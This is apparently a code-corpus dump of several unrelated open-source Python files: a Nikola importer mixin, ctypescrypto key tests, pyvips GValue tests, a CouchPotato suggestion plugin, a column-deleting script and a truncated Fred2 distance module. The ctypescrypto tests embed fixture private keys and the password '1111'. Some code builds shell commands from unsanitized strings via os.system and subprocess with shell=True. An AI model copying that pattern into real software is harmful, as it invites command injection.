full_label, input_type_hints)
def get_input_type_hints(self, transform):
type_hints = transform.get_type_hints()
input_types = None
if type_hints.input_types:
normal_hints, kwarg_hints = type_hints.input_types
if kwarg_hints:
input_types = kwarg_hints
if normal_hints:
input_types = normal_hints
parameter_name = 'Unknown Parameter'
if hasattr(transform, 'fn'):
try:
argspec = inspect.getfullargspec(transform.fn._process_argspec_fn())
except TypeError:
# An unsupported callable was passed to getfullargspec
pass
else:
if len(argspec.args):
arg_index = 0
if argspec.args[0] == 'self' and len(argspec.args) > 1:
arg_index = 1
parameter_name = argspec.args[arg_index]
if isinstance(input_types, dict):
input_types = (input_types[argspec.args[arg_index]], )
if input_types and len(input_types):
input_types = input_types[0]
return parameter_name, input_types
def get_output_type_hints(self, transform):
type_hints = transform.get_type_hints()
output_types = None
if type_hints.output_types:
normal_hints, kwarg_hints = type_hints.output_types
if kwarg_hints:
output_types = kwarg_hints
if normal_hints:
output_types = normal_hints
if output_types and len(output_types):
output_types = output_types[0]
return None, output_types
| apache-2.0 | -7,856,147,975,945,957,000 | 35.06087 | 113 | 0.685958 | false |
xuhdev/nikola | nikola/plugins/basic_import.py | 1 | 7341 | # -*- coding: utf-8 -*-
# Copyright © 2012-2017 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Mixin for importer plugins."""
import io
import csv
import datetime
import os
from pkg_resources import resource_filename
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse # NOQA
from lxml import etree, html
from mako.template import Template
from nikola import utils
links = {}
class ImportMixin(object):
"""Mixin with common used methods."""
name = "import_mixin"
needs_config = False
doc_usage = "[options] export_file"
doc_purpose = "import a dump from a different engine."
cmd_options = [
{
'name': 'output_folder',
'long': 'output-folder',
'short': 'o',
'default': 'new_site',
'help': 'Location to write imported content.'
},
]
def _execute(self, options={}, args=[]):
"""Import a blog from an export into a Nikola site."""
raise NotImplementedError("Must be implemented by a subclass.")
@classmethod
def get_channel_from_file(cls, filename):
"""Get channel from XML file."""
tree = etree.fromstring(cls.read_xml_file(filename))
channel = tree.find('channel')
return channel
@staticmethod
def configure_redirections(url_map, base_dir=''):
"""Configure redirections from an url_map."""
index = base_dir + 'index.html'
if index.startswith('/'):
index = index[1:]
redirections = []
for k, v in url_map.items():
if not k[-1] == '/':
k = k + '/'
# remove the initial "/" because src is a relative file path
src = (urlparse(k).path + 'index.html')[1:]
dst = (urlparse(v).path)
if src == index:
utils.LOGGER.warn("Can't do a redirect for: {0!r}".format(k))
else:
redirections.append((src, dst))
return redirections
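    # Illustrative example (assumed input, not from a real import run):
    #   configure_redirections({'/old-post/': '/posts/new-slug.html'})
    # returns [('old-post/index.html', '/posts/new-slug.html')], i.e. a stub
    # page written at the old URL that redirects to the new location.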
def generate_base_site(self):
"""Generate a base Nikola site."""
if not os.path.exists(self.output_folder):
os.system('nikola init -q ' + self.output_folder)
else:
self.import_into_existing_site = True
            utils.LOGGER.notice('The folder {0} already exists - assuming that this is an '
                                'already existing Nikola site.'.format(self.output_folder))
filename = resource_filename('nikola', 'conf.py.in')
        # The 'strict_undefined=True' will give the missing symbol name, if any
        # (e.g. NameError: 'THEME' is not defined).
        # For other errors from mako/runtime.py, you can add format_exceptions=True,
        # then more info will be written to *somefile* (most probably conf.py)
conf_template = Template(filename=filename, strict_undefined=True)
return conf_template
@staticmethod
def populate_context(channel):
"""Populate context with settings."""
raise NotImplementedError("Must be implemented by a subclass.")
@classmethod
def transform_content(cls, content):
"""Transform content to a Nikola-friendly format."""
return content
@classmethod
def write_content(cls, filename, content, rewrite_html=True):
"""Write content to file."""
if rewrite_html:
try:
doc = html.document_fromstring(content)
doc.rewrite_links(replacer)
content = html.tostring(doc, encoding='utf8')
except etree.ParserError:
content = content.encode('utf-8')
else:
content = content.encode('utf-8')
utils.makedirs(os.path.dirname(filename))
with open(filename, "wb+") as fd:
fd.write(content)
@classmethod
def write_post(cls, filename, content, headers, compiler, rewrite_html=True):
"""Ask the specified compiler to write the post to disk."""
if rewrite_html:
try:
doc = html.document_fromstring(content)
doc.rewrite_links(replacer)
content = html.tostring(doc, encoding='utf8')
except etree.ParserError:
pass
if isinstance(content, utils.bytes_str):
content = content.decode('utf-8')
compiler.create_post(
filename,
content=content,
onefile=True,
**headers)
def write_metadata(self, filename, title, slug, post_date, description, tags, **kwargs):
"""Write metadata to meta file."""
if not description:
description = ""
utils.makedirs(os.path.dirname(filename))
with io.open(filename, "w+", encoding="utf8") as fd:
data = {'title': title, 'slug': slug, 'date': post_date, 'tags': ','.join(tags), 'description': description}
data.update(kwargs)
fd.write(utils.write_metadata(data, site=self.site, comment_wrap=False))
@staticmethod
def write_urlmap_csv(output_file, url_map):
"""Write urlmap to csv file."""
utils.makedirs(os.path.dirname(output_file))
fmode = 'w+'
with io.open(output_file, fmode) as fd:
csv_writer = csv.writer(fd)
for item in url_map.items():
csv_writer.writerow(item)
def get_configuration_output_path(self):
"""Get path for the output configuration file."""
if not self.import_into_existing_site:
filename = 'conf.py'
else:
filename = 'conf.py.{name}-{time}'.format(
time=datetime.datetime.now().strftime('%Y%m%d_%H%M%S'),
name=self.name)
config_output_path = os.path.join(self.output_folder, filename)
utils.LOGGER.info('Configuration will be written to: {0}'.format(config_output_path))
return config_output_path
@staticmethod
def write_configuration(filename, rendered_template):
"""Write the configuration file."""
utils.makedirs(os.path.dirname(filename))
with io.open(filename, 'w+', encoding='utf8') as fd:
fd.write(rendered_template)
def replacer(dst):
"""Replace links."""
return links.get(dst, dst)
| mit | -6,260,775,873,164,549,000 | 35.157635 | 120 | 0.61485 | false |
vbwagner/ctypescrypto | tests/testpkey.py | 1 | 9134 | from ctypescrypto.pkey import PKey
from ctypescrypto import pyver
import unittest,re
from base64 import b64decode, b16decode
from subprocess import Popen,PIPE,CalledProcessError
def pem2der(s):
start=s.find('-----\n')
finish=s.rfind('\n-----END')
data=s[start+6:finish]
return b64decode(data)
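# Minimal illustration (assumed usage): pem2der() strips the BEGIN/END armour
# and base64-decodes the body, e.g. pem2der(TestPKey.ec1priv) yields the DER
# bytes passed to PKey(..., format="DER") in the DER-format tests below.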
def runopenssl(args,indata):
p=Popen(['openssl']+args,stdin=PIPE,stdout=PIPE,stderr=PIPE)
(out,err)=p.communicate(indata)
if p.returncode:
raise CalledProcessError(p.returncode," ".join(['openssl']+args)+":"+err)
if pyver > 2:
out = out.decode("utf-8")
return out
class TestPKey(unittest.TestCase):
rsa="""-----BEGIN PRIVATE KEY-----
MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAL9CzVZu9bczTmB8
776pPUoPo6WbAfwQqqiGrj91bk2mYE+MNLo4yIQH45IcwGzkyS8+YyQJf8Bux5BC
oZ2nwzXm5+JZkxkN1mtMzit2D7/hHmrZLoSbr0sxXFrD4a35RI4hXnSK9Sk01sXA
Te2OgHzm5nk1sG97G6SFq7CHe3gvAgMBAAECgYAgGV8K7Y5xk7vIt88oyZCOuHc3
mP9JRabOp+PgpJ3BjHXHg/lpc5Q7jHNmF0s4O2GEe0z6RFnbevwlOvmS0xAQ1hpg
5TnVVkiZvcJeQaZqWIlEOaLqA12YdhSyorfB6p3tfQ7ZmQusg3SCsru5kPJV4sm0
I+MuRCQZWSzIqelloQJBAPbtScJI0lXx8sktntZi69cAVvLtz5z1T7bZwFakNkNE
SUCjNc/hEEI6/1LScV8Kx9kgQ0+W8smu+GyUDceyVFECQQDGSeS7cTmojkiPQxPB
zb0vS+Nfpq6oYsx+gn5TBgMeWIZZrtMEaUU2o+rwsjKBP/gy6D1zC2b4W5O/A/7a
1GR/AkBUQhYoKKc1UpExGtMXfrvRKrmAvatZeM/Rqi4aooAtpfCFEOw82iStJOqY
/VxYPRqCuaKeVvjT31O/4SlumihxAkBahRU0NKYbuoiJThfQ23lIBB7SZadKG4A7
KJs+j3oQ+lyqyFJwqxX7sazpIJBJzMgjhT24LTZenn++LbbEcz1FAkBmDmxoq7qO
Ao6uTm8fnkD4C836wS4mYAPqwRBK1JvnEXEQee9irf+ip89BAg74ViTcGF9lwJwQ
gOM+X5Db+3pK
-----END PRIVATE KEY-----
"""
rsaenc="""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,7FF0E46291D60D35ACA881131C244655
BeJoui1lRQDvvPr+gH8xCdqkcgKCLWpZTvFZmvrqXmPqMHpm20nK0ESAd6kKm8d1
zaglRIHnnO6V7aDcwgOd3IYPEOnG2TIRQniZrwZdrXIfacscJ6Ekq+5YfLuyrRgq
fscGl7ntm/eGLqwrhzuv7jAXpn9QWiiAld0EWcmZCAW7nGaUQtu4rc4ULwL5SC/M
MOCPwpcD3SCQv55dX3cBOtfZ3lPbpgEpTpnNnj8OtxOkkIaG8yol7luwHvoOSyL/
WuXGCpfJE4LzbxnSLhbiN7q+y/Sro3cGc9aO4tXToMqTFel4zqR0YgOeFazlDRi1
mPuZcGLuSIef0kJn7Mg7jt0DQk579rTVxAhIu2rylTwEozkpCp5g4kGTJON++HQr
BRrApm4XlAoH2GX1jqDBoWSnXCRH49jNGQrLwy469i+994cG8uVU9Z5cqm/LDIR9
kwQfTJIvMi0g28NBMVgJ2gLj40OczxDGyNvBIbhPNswHljfsvPVr4vtxDGx8fS0N
lUJUOL9me+XNZ5xGHYuT5DOr7GE+H3hKEg+XfrYEete9BeI4gm9cqESvrLY9EU5Q
tOtnKKL7SglTZ5LxPMAedADC0o01nzr+D3gAiOhSgoZTrnQsSZ7iTJOtm3vNXwJx
AgesYmXtr5mdiBPKQ1QA/jF5LUZji+5KENd5WHNQw7tOlMLDrPFVRfLZg1AQDljx
u16kdyb71Kk3f6GCOfUntGr+kzppc3DDT+RcLetXphOOEQRy6C6/wmz08WlAPlu5
mFfSDijpWxoUHooQISg5mE82oR8V81aBpbLtm7KevwY=
-----END RSA PRIVATE KEY-----
"""
pkcs8crypt="""-----BEGIN ENCRYPTED PRIVATE KEY-----
MIICoTAbBgkqhkiG9w0BBQMwDgQIipVEnsV/gQoCAggABIICgE1i42C4aBhykhOi
EItFRE+9iBgiklGxoCJtukdp1UwDRKy/GJJ1rcS385CQy4Rs0zN8NH1faVRbf4Vt
iNACHtJx30qMCdo64CR+GJYHS4g2lGaz7PFNma8SjnAbGYXwXkdm5zhwmiU++wC7
W59u8oWS8Dj9dZBMzoOQGQT6xzZwQ14H65zHvC16HdKSNtRgXDWkBnD2cQzuOyuf
rFLyEf7/FH6B7/yKDcwsEfu97uPPxMvuusD1UubWnltO/Hc2oCPibN+dGw1PY9mC
18yGQtZkf5z30yhLosF62IVy3XY9Yf/TJYojIExoASrThGRvENzWkQ3qfnErqmng
l+dy66bmLjicobF5bO3xAhpU1dL+4/1ba2QuthVNlg6Or/iII1ntNN4PFyYcEwmX
e09C3dyOtV7qCq13S1bRkbZhzwi2QbLKALAzrZpF6VYmayTz8KjQOZ8BncAM+BiI
CtwuZJoXLW9kT4D7UsaSZdjUvzBIak5qdCGWpKmahMfjEEsCg6ApuIYmFrCgiY9c
0keYjY8DJ+4bEvqsQvTIaU9F9mFytI1E3LnR0NP1jHuOA7Jc+oNQ2adgFNj12jKQ
qNt1bEGNCqQHSrw7JNCrB7s+QAFNqJtno6fIq7vVNkqadJlnBbCIgm7NlJeGg9j6
a5YVNGlbs0J4dQF4Jw13302IBn3piSzthWL2gL98v/1lEwGuernEpPAjry3YhzM9
VA/oVt22n3yVA6dOSVL1oUTJyawEqASmH0jHAzXNDz+QLSLmz82ARcZPqPvVc45e
5h0xtqtFVkQLNbYzpNWGrx7R1hdr84nOKa8EsIxTRgEL/w9Y4Z/3xEoK2+KVBpMk
oxUuxuU=
-----END ENCRYPTED PRIVATE KEY-----
"""
password="1111"
rsakeytext="""Public-Key: (1024 bit)
Modulus:
00:bf:42:cd:56:6e:f5:b7:33:4e:60:7c:ef:be:a9:
3d:4a:0f:a3:a5:9b:01:fc:10:aa:a8:86:ae:3f:75:
6e:4d:a6:60:4f:8c:34:ba:38:c8:84:07:e3:92:1c:
c0:6c:e4:c9:2f:3e:63:24:09:7f:c0:6e:c7:90:42:
a1:9d:a7:c3:35:e6:e7:e2:59:93:19:0d:d6:6b:4c:
ce:2b:76:0f:bf:e1:1e:6a:d9:2e:84:9b:af:4b:31:
5c:5a:c3:e1:ad:f9:44:8e:21:5e:74:8a:f5:29:34:
d6:c5:c0:4d:ed:8e:80:7c:e6:e6:79:35:b0:6f:7b:
1b:a4:85:ab:b0:87:7b:78:2f
Exponent: 65537 (0x10001)
"""
ec1priv="""-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQgKnG6neqZvB98EEuuxnHs
fv+L/5abuNNG20wzUqRpncOhRANCAARWKXWeUZ6WiCKZ2kHx87jmJyx0G3ZB1iQC
+Gp2AJYswbQPhGPigKolzIbZYfwnn7QOca6N8QDhPAn3QQK8trZI
-----END PRIVATE KEY-----
"""
ec1keytext="""Public-Key: (256 bit)
pub:
04:56:29:75:9e:51:9e:96:88:22:99:da:41:f1:f3:
b8:e6:27:2c:74:1b:76:41:d6:24:02:f8:6a:76:00:
96:2c:c1:b4:0f:84:63:e2:80:aa:25:cc:86:d9:61:
fc:27:9f:b4:0e:71:ae:8d:f1:00:e1:3c:09:f7:41:
02:bc:b6:b6:48
ASN1 OID: secp256k1
"""
ec1pub="""-----BEGIN PUBLIC KEY-----
MFYwEAYHKoZIzj0CAQYFK4EEAAoDQgAEVil1nlGelogimdpB8fO45icsdBt2QdYk
AvhqdgCWLMG0D4Rj4oCqJcyG2WH8J5+0DnGujfEA4TwJ90ECvLa2SA==
-----END PUBLIC KEY-----
"""
def test_unencrypted_pem(self):
key=PKey(privkey=self.rsa)
self.assertTrue(key.cansign)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem(self):
key=PKey(privkey=self.rsaenc,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem_cb(self):
cb=lambda x:self.password
key=PKey(privkey=self.rsaenc,password=cb)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encryped_pem_pkcs8(self):
key=PKey(privkey=self.pkcs8crypt,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_der_pkcs8(self):
pkcs8der = pem2der(self.pkcs8crypt)
key=PKey(privkey=pkcs8der,password=self.password,format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_export_priv_pem(self):
key=PKey(privkey=self.ec1priv)
out=key.exportpriv()
self.assertEqual(self.ec1priv,out)
def test_export_priv_encrypt(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
pem=key.exportpriv(password='2222',cipher=CipherType("aes256"))
if pyver >2:
pem = pem.encode("ascii")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-passin","pass:2222"],
pem),self.rsakeytext)
def test_export_priv_der(self):
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-inform","DER"],
der),self.rsakeytext)
def test_export_priv_der_enc(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER",password='2222',cipher=CipherType("aes256"))
self.assertEqual(runopenssl(["pkcs8","-passin","pass:2222","-inform","DER"],
der),self.rsa)
def test_unencrypted_pem_ec(self):
key=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_unencrypted_der_ec(self):
key=PKey(privkey=pem2der(self.ec1priv),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_pem(self):
key=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_der(self):
key=PKey(pubkey=pem2der(self.ec1pub),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_compare(self):
key1=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key1.key)
key2=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key2.key)
self.assertEqual(key1,key2)
def test_sign(self):
signer=PKey(privkey=self.ec1priv)
digest=b16decode("FFCA2587CFD4846E4CB975B503C9EB940F94566AA394E8BD571458B9DA5097D5")
signature=signer.sign(digest)
self.assertTrue(len(signature)>0)
verifier=PKey(pubkey=self.ec1pub)
self.assertTrue(verifier.verify(digest,signature))
def test_generate(self):
newkey=PKey.generate("rsa")
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (1024 bit)")
def test_generate_params(self):
newkey=PKey.generate("rsa",rsa_keygen_bits=2048)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (2048 bit)")
def test_generate_ec(self):
templkey=PKey(pubkey=self.ec1pub)
newkey=PKey.generate("ec",paramsfrom=templkey)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (256 bit)")
self.assertNotEqual(str(templkey),str(newkey))
if __name__ == "__main__":
unittest.main()
| mit | -7,343,754,033,386,160,000 | 43.125604 | 92 | 0.737464 | false |
x522758754/XlsTools | xlsDelCol.py | 1 | 3807 | #!/user/bin/env python
# coding:utf-8
import sys
import os
import codecs
import pandas as pd
reload(sys)
sys.setdefaultencoding('utf-8')
# Index of the column to delete (0-based)
DELCOL = 1
_DictFileCoding = dict()
def GetAllTxt(srcPath, dstPath):
#print path
srcfiles = []
dstfiles = []
for root, dirs, files in os.walk(srcPath):
for f in files:
if f.endswith('.txt'):
srcfile = os.path.join(root, f)
srcfiles.append(srcfile)
#filePath = filePath.replace('\\','/')
dstfile = srcfile.replace(srcPath, dstPath, 1)
dstfiles.append(dstfile)
return srcfiles, dstfiles
def handleEncoding2Utf(original_file,newfile):
#newfile=original_file[0:original_file.rfind(.)]+'_copy.csv'
f=open(original_file,'rb+')
    content=f.read()  # read the whole file; content is bytes, not str
    source_encoding='utf-8'
    ##### determine the source encoding
try:
content.decode('utf-8').encode('utf-8')
source_encoding='utf-8'
except:
try:
content.decode('gbk').encode('utf-8')
source_encoding='gbk'
except:
try:
content.decode('gb2312').encode('utf-8')
source_encoding='gb2312'
except:
try:
content.decode('gb18030').encode('utf-8')
source_encoding='gb18030'
except:
try:
content.decode('big5').encode('utf-8')
                        source_encoding='big5'
except:
content.decode('cp936').encode('utf-8')
source_encoding='cp936'
f.close()
    ##### read the file with the detected encoding and re-save it as UTF-8:
block_size=4096
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w','utf-8') as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
_DictFileCoding[newfile] = source_encoding
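# Illustrative round trip (file names assumed), mirroring main() below:
#   handleEncoding2Utf('Data/a.txt', 'Datas/a.txt')     # legacy encoding -> UTF-8 copy
#   DelColFile('Datas/a.txt')                           # drop column DELCOL from the copy
#   handleEncodingUtf2('Datas/a.txt', 'Data/a.txt', _DictFileCoding['Datas/a.txt'])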
def handleEncodingUtf2(original_file, newfile, coding = 'gbk'):
block_size=4096
source_encoding = 'utf-8'
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w', coding) as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
def DelRowFile(srcPath, dstPath):
dir = os.path.dirname(dstPath)
if not os.path.exists(dir):
os.makedirs(dir)
with open(srcPath) as fp_in:
with open(dstPath, 'w') as fp_out:
#fp_out.writelines(line for i, line in enumerate(fp_in) if i != DELROW)
for line in fp_in.readlines():
print line
fp_out.write(line)
def DelColFile(srcPath):
#df = pd.read_csv(srcPath, encoding='utf-8')
df = pd.read_csv(srcPath,sep='\t',header=None, encoding='utf-8',)
df.drop([df.columns[DELCOL]], axis=1, inplace=True)
df.to_csv(srcPath, sep='\t',header=None, encoding='utf-8',index=None)
def main(argv):
#temp='TaskConfig'
#handleEncoding2Utf('Data/public/' + temp +'.txt', 'Dat/' + temp +'.txt')
#DelColFile('Dat/' + temp +'.txt')
#handleEncodingUtf2('Dat/' + temp +'.txt', 'Da/' + temp +'.txt')
#return
src = ""
dst = ""
if(len(argv) != 3):
#return
src = 'Data'
dst = 'Datas'
else:
src = argv[1]
dst = argv[2]
if not os.path.exists(src):
        print u'Error! ----------------source directory: %s does not exist' %(src)
return
    print u'----------------source directory %s---------------' %(src)
    print u'----------------destination directory %s---------------' %(dst)
srcfiles, dstfiles = GetAllTxt(src, dst)
fLen = len(srcfiles)
for i in range(fLen):
src_file = srcfiles[i]
dst_file = dstfiles[i]
handleEncoding2Utf(src_file, dst_file)
DelColFile(dst_file)
handleEncodingUtf2(dst_file, src_file,_DictFileCoding[dst_file])
if('__main__' == __name__):
main(sys.argv)
| mit | 5,793,836,253,580,370,000 | 25.134752 | 74 | 0.652917 | false |
kleisauke/pyvips | pyvips/tests/test_gvalue.py | 1 | 3235 | # vim: set fileencoding=utf-8 :
import unittest
import pyvips
from .helpers import PyvipsTester, JPEG_FILE
class TestGValue(PyvipsTester):
def test_bool(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gbool_type)
gv.set(True)
value = gv.get()
self.assertEqual(value, True)
gv.set(False)
value = gv.get()
self.assertEqual(value, False)
def test_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gint_type)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gdouble_type)
gv.set(3.1415)
value = gv.get()
self.assertEqual(value, 3.1415)
def test_enum(self):
# the Interpretation enum is created when the first image is made --
# make it ourselves in case we are run before the first image
pyvips.vips_lib.vips_interpretation_get_type()
interpretation_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsInterpretation')
gv = pyvips.GValue()
gv.set_type(interpretation_gtype)
gv.set('xyz')
value = gv.get()
self.assertEqual(value, 'xyz')
def test_flags(self):
# the OperationFlags enum is created when the first op is made --
# make it ourselves in case we are run before that
pyvips.vips_lib.vips_operation_flags_get_type()
operationflags_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsOperationFlags')
gv = pyvips.GValue()
gv.set_type(operationflags_gtype)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_string(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gstr_type)
gv.set('banana')
value = gv.get()
self.assertEqual(value, 'banana')
def test_array_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_int_type)
gv.set([1, 2, 3])
value = gv.get()
self.assertAlmostEqualObjects(value, [1, 2, 3])
def test_array_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_double_type)
gv.set([1.1, 2.1, 3.1])
value = gv.get()
self.assertAlmostEqualObjects(value, [1.1, 2.1, 3.1])
def test_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.image_type)
gv.set(image)
value = gv.get()
self.assertEqual(value, image)
def test_array_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
r, g, b = image.bandsplit()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_image_type)
gv.set([r, g, b])
value = gv.get()
self.assertEqual(value, [r, g, b])
def test_blob(self):
with open(JPEG_FILE, 'rb') as f:
blob = f.read()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.blob_type)
gv.set(blob)
value = gv.get()
self.assertEqual(value, blob)
if __name__ == '__main__':
unittest.main()
| mit | 4,357,290,625,036,344,300 | 29.233645 | 76 | 0.57898 | false |
TNosredna/CouchPotatoServer | couchpotato/core/plugins/suggestion/main.py | 1 | 3422 | from couchpotato import get_session
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.variable import splitString, md5
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Movie
from couchpotato.environment import Env
from sqlalchemy.sql.expression import or_
class Suggestion(Plugin):
def __init__(self):
addApiView('suggestion.view', self.suggestView)
addApiView('suggestion.ignore', self.ignoreView)
def suggestView(self, **kwargs):
movies = splitString(kwargs.get('movies', ''))
ignored = splitString(kwargs.get('ignored', ''))
limit = kwargs.get('limit', 6)
if not movies or len(movies) == 0:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
if not ignored or len(ignored) == 0:
ignored = splitString(Env.prop('suggest_ignore', default = ''))
cached_suggestion = self.getCache('suggestion_cached')
if cached_suggestion:
suggestions = cached_suggestion
else:
suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
self.setCache(md5(ss('suggestion_cached')), suggestions, timeout = 6048000) # Cache for 10 weeks
return {
'success': True,
'count': len(suggestions),
'suggestions': suggestions[:limit]
}
def ignoreView(self, imdb = None, limit = 6, remove_only = False, **kwargs):
ignored = splitString(Env.prop('suggest_ignore', default = ''))
if imdb:
if not remove_only:
ignored.append(imdb)
Env.prop('suggest_ignore', ','.join(set(ignored)))
new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored)
return {
'result': True,
'ignore_count': len(ignored),
'suggestions': new_suggestions[limit - 1:limit]
}
def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None):
# Combine with previous suggestion_cache
cached_suggestion = self.getCache('suggestion_cached')
new_suggestions = []
ignored = [] if not ignored else ignored
if ignore_imdb:
for cs in cached_suggestion:
if cs.get('imdb') != ignore_imdb:
new_suggestions.append(cs)
# Get new results and add them
if len(new_suggestions) - 1 < limit:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
ignored.extend([x.get('imdb') for x in cached_suggestion])
suggestions = fireEvent('movie.suggest', movies = movies, ignore = list(set(ignored)), single = True)
if suggestions:
new_suggestions.extend(suggestions)
self.setCache(md5(ss('suggestion_cached')), new_suggestions, timeout = 6048000)
return new_suggestions
| gpl-3.0 | 2,790,638,608,713,622,000 | 36.604396 | 113 | 0.611631 | false |
FRED-2/Fred2-Apps | src/Distance2SelfBinding.py | 2 | 3775 | # This code is part of the Fred2 distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
from tempfile import NamedTemporaryFile
__author__ = 'mohr,schubert'
import os
import subprocess
import logging
import itertools
import pandas
from Fred2.Core import Allele, AExternal
import DistanceMatrices
from DistanceMatrix import DistanceMatrix
class Distance2Self(object):
"""
    Implements the calculation routine for the distance of a peptide to (self) peptides.
    Calculates the k closest distances of a peptide to a peptide set represented as a trie.
    All our matrices have the same ordering of letters.
    If you use a new matrix, please make sure to use the same ordering! Otherwise the tries have to be recomputed!
"""
def __init__(self, _matrix, trie=None, saveTrieFile=False):
self.__saveTrieFile = saveTrieFile
self.__matrix = _matrix
self.__trie = trie
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.__externalPathDistanceCalculator = os.path.join(this_dir, 'compute_distances_ivac')
self.__externalPathTrieGenerator = os.path.join(this_dir, 'get_TrieArray')
def __del__(self):
if not self.__saveTrieFile:
pass
def generate_trie(self, fastaFile, outfile='peptideTrie', peptideLength=9):
cmd = self.__externalPathTrieGenerator + " %s %s %s %s"
specifiedTrie = outfile
self.__trie = specifiedTrie
subprocess.check_output(cmd%(fastaFile, self.__matrix.path_to_matrix_file, peptideLength, specifiedTrie), shell=True)
def calculate_distances(self, peptides, pep_header="neopeptide", specifiedTrie="uniprot_proteome_l9", n=10):
def __load_trie(trieSource):
current = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
return os.path.join(current,"data","tries","{}.trie".format(trieSource))
# create temporary file with peptides for distance computation
tmpFile = NamedTemporaryFile(delete=False)
with open(tmpFile.name, "w") as peptidesFile:
for pep in peptides:
peptidesFile.write('%s\n' % pep)
cmd = self.__externalPathDistanceCalculator + " %s %s %s %s"
results = {}
trie = specifiedTrie if os.path.isfile(specifiedTrie) else __load_trie(specifiedTrie)
